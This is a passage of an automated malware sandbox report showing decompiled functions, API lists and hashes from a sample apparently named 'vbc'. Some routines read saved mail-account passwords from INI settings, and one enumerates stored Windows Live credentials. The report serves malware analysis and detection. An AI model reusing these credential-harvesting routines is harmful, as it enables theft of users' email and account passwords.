                                                                                                                                                    0x004087b6
                                                                                                                                                    0x004087b9
                                                                                                                                                    0x004087c0
                                                                                                                                                    0x004087c0
                                                                                                                                                    0x004087c0
                                                                                                                                                    0x004087c3
                                                                                                                                                    0x004087c5
                                                                                                                                                    0x004087c8
                                                                                                                                                    0x004087d7
                                                                                                                                                    0x004087dc
                                                                                                                                                    0x004087eb
                                                                                                                                                    0x004087f1
                                                                                                                                                    0x004087f4
                                                                                                                                                    0x004087ff
                                                                                                                                                    0x00408809
                                                                                                                                                    0x00408811
                                                                                                                                                    0x00408814
                                                                                                                                                    0x00408818
                                                                                                                                                    0x00408831
                                                                                                                                                    0x00408835
                                                                                                                                                    0x00408842
                                                                                                                                                    0x00408846
                                                                                                                                                    0x00408846
                                                                                                                                                    0x00408847
                                                                                                                                                    0x0040884b
                                                                                                                                                    0x0040884b
                                                                                                                                                    0x0040885b
                                                                                                                                                    0x0040885f
                                                                                                                                                    0x00408866
                                                                                                                                                    0x00408869
                                                                                                                                                    0x0040886e
                                                                                                                                                    0x00408871
                                                                                                                                                    0x0040887c
                                                                                                                                                    0x0040887d
                                                                                                                                                    0x00408882
                                                                                                                                                    0x00408884
                                                                                                                                                    0x00408887
                                                                                                                                                    0x0040888c
                                                                                                                                                    0x00408892
                                                                                                                                                    0x004088ee
                                                                                                                                                    0x004088ee
                                                                                                                                                    0x00408894
                                                                                                                                                    0x00408894
                                                                                                                                                    0x00408897
                                                                                                                                                    0x00408899
                                                                                                                                                    0x0040889c
                                                                                                                                                    0x0040889e
                                                                                                                                                    0x0040889e
                                                                                                                                                    0x004088a8
                                                                                                                                                    0x004088af
                                                                                                                                                    0x004088b2
                                                                                                                                                    0x004088b7
                                                                                                                                                    0x004088be
                                                                                                                                                    0x004088bf
                                                                                                                                                    0x004088c4
                                                                                                                                                    0x004088c9
                                                                                                                                                    0x004088cb
                                                                                                                                                    0x004088cb
                                                                                                                                                    0x004088d2
                                                                                                                                                    0x004088d5
                                                                                                                                                    0x004088db
                                                                                                                                                    0x004088e6
                                                                                                                                                    0x004088e6
                                                                                                                                                    0x004088ec
                                                                                                                                                    0x004088f0
                                                                                                                                                    0x004088fa
                                                                                                                                                    0x00408902
                                                                                                                                                    0x00408905
                                                                                                                                                    0x0040890b
                                                                                                                                                    0x00408911
                                                                                                                                                    0x00408917
                                                                                                                                                    0x0040892a

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040857E
                                                                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040858C
                                                                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040859D
                                                                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085B4
                                                                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085BD
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00408793
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004087AF
                                                                                                                                                    • memcpy.MSVCRT ref: 004087D7
                                                                                                                                                    • memcpy.MSVCRT ref: 004087F4
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040887D
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00408887
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004088BF
                                                                                                                                                      • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                                                                                                                      • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                                                                                                                      • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,75144DE0), ref: 0040797A
                                                                                                                                                      • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@??3@$memcpy$LoadStringstrcpystrlen
                                                                                                                                                    • String ID: d$hA
                                                                                                                                                    • API String ID: 3781940870-4030989184
                                                                                                                                                    • Opcode ID: 6c64bdb5196202114d018d6502db394b3a43eca9dd46e983fc9d5c63418de248
                                                                                                                                                    • Instruction ID: 2ee817cab8fb9d662dc1fdc17dcda2a390100e1008d8253a008a3d74f0a2914d
                                                                                                                                                    • Opcode Fuzzy Hash: 6c64bdb5196202114d018d6502db394b3a43eca9dd46e983fc9d5c63418de248
                                                                                                                                                    • Instruction Fuzzy Hash: 76518D72A01704AFDB24DF2AC582B9AB7E5FF48354F10852EE54ADB391EB74E940CB44
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040314D Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 67%
                                                                                                                                                    			E0040314D(void* __eax, intOrPtr _a4, char* _a8) {
				signed int _v8;
				intOrPtr _v12;
				char _v188;
				char _v268;
				char _v524;
				void* __ebx;
				void* __edi;
				char* _t53;
				void* _t60;
				void* _t65;
				char* _t70;

				_v8 = _v8 & 0x00000000;
				_t65 = __eax;
				 *((intOrPtr*)(__eax + 0x8c)) = 3;
				 *((intOrPtr*)(__eax + 0x210)) = 1;
				E0040311F(_a4, "UsesIMAP",  &_v524, 0xff, _a8);
				if(_v524 == 0x31) {
					 *((intOrPtr*)(_t65 + 0x210)) = 2;
				}
				_v12 = _t65 + 0x110;
				E0040311F(_a4, "PopServer", _t65 + 0x110, 0x7f, _a8);
				_t70 = _t65 + 0x214;
				E0040311F(_a4, "LoginName", _t70, 0x7f, _a8);
				E0040311F(_a4, "RealName", _t65 + 0xc, 0x7f, _a8);
				E0040311F(_a4, "ReturnAddress", _t65 + 0x90, 0x7f, _a8);
				E0040311F(_a4, "SavePasswordText",  &_v268, 0xff, _a8);
				if(_v268 != 0) {
					_v188 = 0;
					E00401D5A( &_v268, _t65 + 0x294);
					if( *_t70 == 0) {
						_push(_a8);
						_t60 = 0x7f;
						_push(_t60);
						_push(_t70);
						_push("PopAccount");
						_push(_a4);
						E0040311F();
						if( *_t70 != 0) {
							_t53 = strchr(_t70, 0x40);
							_a8 = _t53;
							if(_t53 != 0) {
								E004060D0(_t60, _v12,  &(_t53[1]));
								 *_a8 = 0;
							}
						}
					}
					_v8 = 1;
				}
				if( *_t70 != 0) {
					_v8 = 1;
				}
				return _v8;
			}














                                                                                                                                                    0x00403156
                                                                                                                                                    0x00403160
                                                                                                                                                    0x00403177
                                                                                                                                                    0x00403181
                                                                                                                                                    0x0040318b
                                                                                                                                                    0x00403197
                                                                                                                                                    0x00403199
                                                                                                                                                    0x00403199
                                                                                                                                                    0x004031b7
                                                                                                                                                    0x004031ba
                                                                                                                                                    0x004031c2
                                                                                                                                                    0x004031d3
                                                                                                                                                    0x004031e9
                                                                                                                                                    0x00403202
                                                                                                                                                    0x0040321a
                                                                                                                                                    0x00403226
                                                                                                                                                    0x00403234
                                                                                                                                                    0x0040323b
                                                                                                                                                    0x00403243
                                                                                                                                                    0x00403245
                                                                                                                                                    0x0040324a
                                                                                                                                                    0x0040324b
                                                                                                                                                    0x0040324c
                                                                                                                                                    0x0040324d
                                                                                                                                                    0x00403252
                                                                                                                                                    0x00403255
                                                                                                                                                    0x0040325d
                                                                                                                                                    0x00403262
                                                                                                                                                    0x0040326b
                                                                                                                                                    0x0040326e
                                                                                                                                                    0x00403275
                                                                                                                                                    0x0040327e
                                                                                                                                                    0x0040327e
                                                                                                                                                    0x0040326e
                                                                                                                                                    0x0040325d
                                                                                                                                                    0x00403281
                                                                                                                                                    0x00403281
                                                                                                                                                    0x0040328e
                                                                                                                                                    0x00403290
                                                                                                                                                    0x00403290
                                                                                                                                                    0x0040329b

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040311F: GetPrivateProfileStringA.KERNEL32(00000000,?,Function_00012466,?,?,?), ref: 00403143
                                                                                                                                                    • strchr.MSVCRT ref: 00403262
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfileStringstrchr
                                                                                                                                                    • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                    • API String ID: 1348940319-1729847305
                                                                                                                                                    • Opcode ID: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
                                                                                                                                                    • Instruction ID: 1cfb9ddeec5dd782170234712f417fe000b4b626ad5f21becf6162a2306db812
                                                                                                                                                    • Opcode Fuzzy Hash: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
                                                                                                                                                    • Instruction Fuzzy Hash: 7631B370A04209BEEF119F20CC06FD97F6CAF14318F10816AF95C7A1D2C7B95B958B54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040F09D Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 16%
                                                                                                                                                    			E0040F09D(char* __eax, void* __ecx) {
				void* _t2;
				char* _t3;
				void* _t5;
				void* _t6;
				void* _t7;

				_t3 = __eax;
				_t6 = __ecx;
				_t5 = 4;
				while(1) {
					_t2 =  *_t3;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t5);
					_push("&lt;");
					L14:
					_t2 = memcpy(_t6, ??, ??);
					_t7 = _t7 + 0xc;
					_t6 = _t6 + _t5;
					L16:
					if( *_t3 != 0) {
						_t3 = _t3 + 1;
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if(_t2 != 0xb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t6 = _t2;
										_t6 = _t6 + 1;
									} else {
										_push(_t5);
										_push("<br>");
										goto L14;
									}
								} else {
									_push(5);
									_push("&amp;");
									goto L11;
								}
							} else {
								_push(5);
								_push("&deg;");
								L11:
								_t2 = memcpy(_t6, ??, ??);
								_t7 = _t7 + 0xc;
								_t6 = _t6 + 5;
							}
						} else {
							_t2 = memcpy(_t6, "&quot;", 6);
							_t7 = _t7 + 0xc;
							_t6 = _t6 + 6;
						}
					} else {
						_push(_t5);
						_push("&gt;");
						goto L14;
					}
					goto L16;
				}
			}








                                                                                                                                                    0x0040f0a2
                                                                                                                                                    0x0040f0a4
                                                                                                                                                    0x0040f0a6
                                                                                                                                                    0x0040f0a7
                                                                                                                                                    0x0040f0a7
                                                                                                                                                    0x0040f0ab
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040f0ad
                                                                                                                                                    0x0040f0ae
                                                                                                                                                    0x0040f10a
                                                                                                                                                    0x0040f10b
                                                                                                                                                    0x0040f110
                                                                                                                                                    0x0040f113
                                                                                                                                                    0x0040f11a
                                                                                                                                                    0x0040f11d
                                                                                                                                                    0x0040f11f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040f11f
                                                                                                                                                    0x0040f125
                                                                                                                                                    0x0040f0b5
                                                                                                                                                    0x0040f0b7
                                                                                                                                                    0x0040f0c3
                                                                                                                                                    0x0040f0dc
                                                                                                                                                    0x0040f0e9
                                                                                                                                                    0x0040f102
                                                                                                                                                    0x0040f117
                                                                                                                                                    0x0040f119
                                                                                                                                                    0x0040f104
                                                                                                                                                    0x0040f104
                                                                                                                                                    0x0040f105
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040f105
                                                                                                                                                    0x0040f0eb
                                                                                                                                                    0x0040f0eb
                                                                                                                                                    0x0040f0ed
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040f0ed
                                                                                                                                                    0x0040f0de
                                                                                                                                                    0x0040f0de
                                                                                                                                                    0x0040f0e0
                                                                                                                                                    0x0040f0f2
                                                                                                                                                    0x0040f0f3
                                                                                                                                                    0x0040f0f8
                                                                                                                                                    0x0040f0fb
                                                                                                                                                    0x0040f0fb
                                                                                                                                                    0x0040f0c5
                                                                                                                                                    0x0040f0cd
                                                                                                                                                    0x0040f0d2
                                                                                                                                                    0x0040f0d5
                                                                                                                                                    0x0040f0d5
                                                                                                                                                    0x0040f0b9
                                                                                                                                                    0x0040f0b9
                                                                                                                                                    0x0040f0ba
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040f0ba
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040f0b7

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy
                                                                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                                                                    • Opcode ID: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
                                                                                                                                                    • Instruction ID: 3259d816fa1e591736f6461b451ad75962e4f861ee845343ab42ffe8f3feec31
                                                                                                                                                    • Opcode Fuzzy Hash: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
                                                                                                                                                    • Instruction Fuzzy Hash: 450171B2E852A4B5DA350905AC07FA70B865BA6B11F350037F58639AC2E1AD0D8F516F
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040D865 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 69%
                                                                                                                                                    			E0040D865(intOrPtr* _a4) {
				char _v260;
				char _v516;
				void _v771;
				char _v772;
				intOrPtr _v776;
				intOrPtr _v780;
				intOrPtr _v788;
				int _v796;
				char _v800;
				signed int _v804;
				char _v808;
				char _v812;
				void* __edi;
				void* __esi;
				intOrPtr* _t52;
				void* _t53;
				void* _t57;
				signed int _t58;
				char* _t65;
				unsigned int _t68;
				intOrPtr _t69;
				void* _t85;
				char* _t89;
				intOrPtr _t92;
				intOrPtr* _t93;
				signed int _t94;
				void* _t96;

				_t52 = _a4;
				_t96 = (_t94 & 0xfffffff8) - 0x32c;
				_push(_t85);
				 *((intOrPtr*)(_t52 + 4)) = 0;
				 *((intOrPtr*)(_t52 + 8)) = 0;
				_t89 = 0;
				_t53 = E00406278();
				_t97 =  *((intOrPtr*)(_t53 + 4)) - 5;
				if( *((intOrPtr*)(_t53 + 4)) > 5) {
					_t89 = L"WindowsLive:name=*";
				}
				_v800 = 0;
				_v796 = 0;
				if(E00404647( &_v800, _t85, _t97) == 0) {
					L21:
					return E004046C2( &_v800);
				}
				_v808 = 0;
				_v812 = 0;
				if(_v780 == 0) {
					_t57 = 0;
					__eflags = 0;
				} else {
					_t57 = _v776(_t89, 0,  &_v812,  &_v808);
				}
				if(_t57 == 0) {
					goto L21;
				} else {
					_t58 = 0;
					_v804 = 0;
					if(_v812 <= 0) {
						L20:
						_v788(_v808);
						goto L21;
					} else {
						do {
							_t92 =  *((intOrPtr*)(_v808 + _t58 * 4));
							if( *((intOrPtr*)(_t92 + 4)) == 1 &&  *(_t92 + 8) != 0 &&  *(_t92 + 0x30) != 0) {
								_v772 = 0;
								memset( &_v771, 0, 0xff);
								_t96 = _t96 + 0xc;
								if(WideCharToMultiByte(0, 0,  *(_t92 + 8), 0xffffffff,  &_v772, 0xff, 0, 0) > 0) {
									_push(0x11);
									_t65 =  &_v772;
									_push("windowslive:name=");
									_push(_t65);
									L00411612();
									_t96 = _t96 + 0xc;
									if(_t65 == 0) {
										_v516 = 0;
										_v260 = 0;
										WideCharToMultiByte(0, 0,  *(_t92 + 0x30), 0xffffffff,  &_v516, 0xff, 0, 0);
										_t68 =  *(_t92 + 0x18);
										if(_t68 > 0) {
											WideCharToMultiByte(0, 0,  *(_t92 + 0x1c), _t68 >> 1,  &_v260, 0xff, 0, 0);
											 *((char*)(_t96 + ( *(_t92 + 0x18) >> 1) + 0x238)) = 0;
										}
										if(_v260 == 0) {
											_t69 = _a4;
											_t44 = _t69 + 8;
											 *_t44 =  *((intOrPtr*)(_t69 + 8)) + 1;
											__eflags =  *_t44;
										} else {
											_t93 = _a4;
											 *((intOrPtr*)( *_t93 + 4))( &_v516);
											 *((intOrPtr*)(_t93 + 4)) =  *((intOrPtr*)(_t93 + 4)) + 1;
										}
									}
								}
							}
							_t58 = _v804 + 1;
							_v804 = _t58;
						} while (_t58 < _v812);
						goto L20;
					}
				}
			}






























                                                                                                                                                    0x0040d86b
                                                                                                                                                    0x0040d86e
                                                                                                                                                    0x0040d878
                                                                                                                                                    0x0040d879
                                                                                                                                                    0x0040d87c
                                                                                                                                                    0x0040d87f
                                                                                                                                                    0x0040d881
                                                                                                                                                    0x0040d886
                                                                                                                                                    0x0040d88a
                                                                                                                                                    0x0040d88c
                                                                                                                                                    0x0040d88c
                                                                                                                                                    0x0040d895
                                                                                                                                                    0x0040d899
                                                                                                                                                    0x0040d8a4
                                                                                                                                                    0x0040d9e7
                                                                                                                                                    0x0040d9f6
                                                                                                                                                    0x0040d9f6
                                                                                                                                                    0x0040d8ae
                                                                                                                                                    0x0040d8b2
                                                                                                                                                    0x0040d8b6
                                                                                                                                                    0x0040d8ca
                                                                                                                                                    0x0040d8ca
                                                                                                                                                    0x0040d8b8
                                                                                                                                                    0x0040d8c4
                                                                                                                                                    0x0040d8c4
                                                                                                                                                    0x0040d8ce
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d8d4
                                                                                                                                                    0x0040d8d4
                                                                                                                                                    0x0040d8da
                                                                                                                                                    0x0040d8de
                                                                                                                                                    0x0040d9df
                                                                                                                                                    0x0040d9e3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d8e4
                                                                                                                                                    0x0040d8e9
                                                                                                                                                    0x0040d8ed
                                                                                                                                                    0x0040d8f4
                                                                                                                                                    0x0040d913
                                                                                                                                                    0x0040d917
                                                                                                                                                    0x0040d91c
                                                                                                                                                    0x0040d936
                                                                                                                                                    0x0040d93c
                                                                                                                                                    0x0040d93e
                                                                                                                                                    0x0040d942
                                                                                                                                                    0x0040d947
                                                                                                                                                    0x0040d948
                                                                                                                                                    0x0040d94d
                                                                                                                                                    0x0040d952
                                                                                                                                                    0x0040d964
                                                                                                                                                    0x0040d96d
                                                                                                                                                    0x0040d974
                                                                                                                                                    0x0040d97a
                                                                                                                                                    0x0040d97f
                                                                                                                                                    0x0040d994
                                                                                                                                                    0x0040d99f
                                                                                                                                                    0x0040d99f
                                                                                                                                                    0x0040d9ad
                                                                                                                                                    0x0040d9c6
                                                                                                                                                    0x0040d9c9
                                                                                                                                                    0x0040d9c9
                                                                                                                                                    0x0040d9c9
                                                                                                                                                    0x0040d9af
                                                                                                                                                    0x0040d9af
                                                                                                                                                    0x0040d9be
                                                                                                                                                    0x0040d9c1
                                                                                                                                                    0x0040d9c1
                                                                                                                                                    0x0040d9ad
                                                                                                                                                    0x0040d952
                                                                                                                                                    0x0040d936
                                                                                                                                                    0x0040d9d0
                                                                                                                                                    0x0040d9d5
                                                                                                                                                    0x0040d9d5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d8e9
                                                                                                                                                    0x0040d8de

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
                                                                                                                                                    • memset.MSVCRT ref: 0040D917
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040D92E
                                                                                                                                                    • _strnicmp.MSVCRT ref: 0040D948
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D974
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D994
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                    • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                    • API String ID: 945165440-3589380929
                                                                                                                                                    • Opcode ID: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
                                                                                                                                                    • Instruction ID: 27d6d704735a973bd95cec350459a8e2137e61d4893fa240fc9d50cc053063f8
                                                                                                                                                    • Opcode Fuzzy Hash: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
                                                                                                                                                    • Instruction Fuzzy Hash: FD4183B1904345AFC720EF54D9849ABBBECEB84344F044A3EF995A3291D734DD48CB66
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00407FEB Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                                    			E00407FEB(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v259;
				char _v260;
				void _v4359;
				char _v4360;
				int _t17;
				CHAR* _t26;

				E004118A0(0x1104, __ecx);
				_v4360 = 0;
				memset( &_v4359, 0, 0x1000);
				_t17 = GetDlgCtrlID(_a4);
				_t35 = _t17;
				GetWindowTextA(_a4,  &_v4360, 0x1000);
				if(_t17 > 0 && _v4360 != 0) {
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					GetClassNameA(_a4,  &_v260, 0xff);
					_t26 =  &_v260;
					_push("sysdatetimepick32");
					_push(_t26);
					L004115B2();
					if(_t26 != 0) {
						E00407EC3(_t35,  &_v4360);
					}
				}
				return 1;
			}









                                                                                                                                                    0x00407ff3
                                                                                                                                                    0x0040800b
                                                                                                                                                    0x00408011
                                                                                                                                                    0x0040801c
                                                                                                                                                    0x00408022
                                                                                                                                                    0x0040802f
                                                                                                                                                    0x00408037
                                                                                                                                                    0x0040804f
                                                                                                                                                    0x00408055
                                                                                                                                                    0x00408068
                                                                                                                                                    0x0040806e
                                                                                                                                                    0x00408074
                                                                                                                                                    0x00408079
                                                                                                                                                    0x0040807a
                                                                                                                                                    0x00408083
                                                                                                                                                    0x0040808d
                                                                                                                                                    0x00408093
                                                                                                                                                    0x00408083
                                                                                                                                                    0x0040809b

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 00408011
                                                                                                                                                    • GetDlgCtrlID.USER32 ref: 0040801C
                                                                                                                                                    • GetWindowTextA.USER32 ref: 0040802F
                                                                                                                                                    • memset.MSVCRT ref: 00408055
                                                                                                                                                    • GetClassNameA.USER32(?,?,000000FF), ref: 00408068
                                                                                                                                                    • _stricmp.MSVCRT(?,sysdatetimepick32), ref: 0040807A
                                                                                                                                                      • Part of subcall function 00407EC3: _itoa.MSVCRT ref: 00407EE4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itoa_stricmp
                                                                                                                                                    • String ID: sysdatetimepick32
                                                                                                                                                    • API String ID: 896699463-4169760276
                                                                                                                                                    • Opcode ID: 2e87e3ae20d77166e7272aa9ea6a9449553f890dc716fe518baf187b76836374
                                                                                                                                                    • Instruction ID: 1a4d9fd07e56cfca2567f2ea4562d04845e15f14fd3b0b17285a92413f4c7fe9
                                                                                                                                                    • Opcode Fuzzy Hash: 2e87e3ae20d77166e7272aa9ea6a9449553f890dc716fe518baf187b76836374
                                                                                                                                                    • Instruction Fuzzy Hash: 8811E3728040187EDB119B64DC81DEB7BACEF58355F0440BBFB49E2151EA789FC88B69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00405715 Relevance: 12.2, APIs: 8, Instructions: 196windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                                    			E00405715(signed int __ecx, intOrPtr _a4, unsigned int _a8, intOrPtr* _a12) {
				signed int _v8;
				intOrPtr _v16;
				void* __esi;
				void* _t74;
				void* _t75;
				signed int _t76;
				signed int _t89;
				signed int _t90;
				void* _t98;
				void* _t101;
				short* _t118;
				unsigned int _t126;
				intOrPtr _t128;
				signed int _t131;
				void* _t144;
				intOrPtr* _t146;
				short _t153;
				signed int _t155;

				_t129 = __ecx;
				_push(__ecx);
				_t74 = _a4 - 0x4e;
				_t155 = __ecx;
				if(_t74 == 0) {
					_t146 = _a12;
					__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xfffffffd;
					if( *((intOrPtr*)(_t146 + 8)) == 0xfffffffd) {
						__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
						if(__eflags == 0) {
							E00404D42(__eflags,  *_t146,  *(_t146 + 0xc));
						}
					}
					__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xffffff9b;
					if( *((intOrPtr*)(_t146 + 8)) != 0xffffff9b) {
						L27:
						_t75 = 0;
						__eflags = 0;
						goto L28;
					} else {
						__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
						if( *((intOrPtr*)(_t146 + 4)) != 0x3e9) {
							goto L27;
						}
						_t76 =  *(_t146 + 0x14);
						__eflags = _t76 & 0x00000002;
						if((_t76 & 0x00000002) == 0) {
							L36:
							_t131 =  *(_t146 + 0x18) ^ _t76;
							__eflags = 0x0000f000 & _t131;
							if((0x0000f000 & _t131) == 0) {
								L39:
								__eflags =  *(_t146 + 0x14) & 0x00000002;
								if(( *(_t146 + 0x14) & 0x00000002) == 0) {
									goto L27;
								}
								__eflags =  *(_t146 + 0x18) & 0x00000002;
								if(( *(_t146 + 0x18) & 0x00000002) != 0) {
									goto L27;
								}
								__eflags =  *(_t146 + 0xc);
								E00401469(_t155, 0x3eb, 0 |  *(_t146 + 0xc) != 0x00000000);
								__eflags =  *(_t146 + 0xc) -  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 1;
								E00401469(_t155, 0x3ec, 0 |  *(_t146 + 0xc) !=  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 0x00000001);
								 *((intOrPtr*)(_t155 + 0x14)) = 1;
								SetDlgItemInt( *(_t155 + 4), 0x3ed,  *( *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) +  *(_t146 + 0x28) * 4), 0);
								 *((intOrPtr*)(_t155 + 0x14)) = 0;
								_t75 = 1;
								L28:
								return _t75;
							}
							L37:
							_t89 = E004048DC( *_t146,  *(_t146 + 0xc), 0xf002);
							__eflags = _t89 & 0x00000002;
							if((_t89 & 0x00000002) != 0) {
								_t90 = _t89 & 0x0000f000;
								__eflags = _t90 - 0x1000;
								_v8 = _t90;
								E00401469(_t155, 0x3ee, 0 | _t90 == 0x00001000);
								_v16 - 0x2000 = _v16 == 0x2000;
								E00401469(_t155, 0x3ef, 0 | _v16 == 0x00002000);
							}
							goto L39;
						}
						__eflags =  *(_t146 + 0x18) & 0x00000002;
						if(( *(_t146 + 0x18) & 0x00000002) == 0) {
							goto L37;
						}
						goto L36;
					}
				}
				_t98 = _t74 - 0xc2;
				if(_t98 == 0) {
					SendDlgItemMessageA( *(__ecx + 4), 0x3ed, 0xc5, 3, 0);
					E0040559F(_t155);
					goto L27;
				}
				_t101 = _t98 - 1;
				if(_t101 != 0) {
					goto L27;
				}
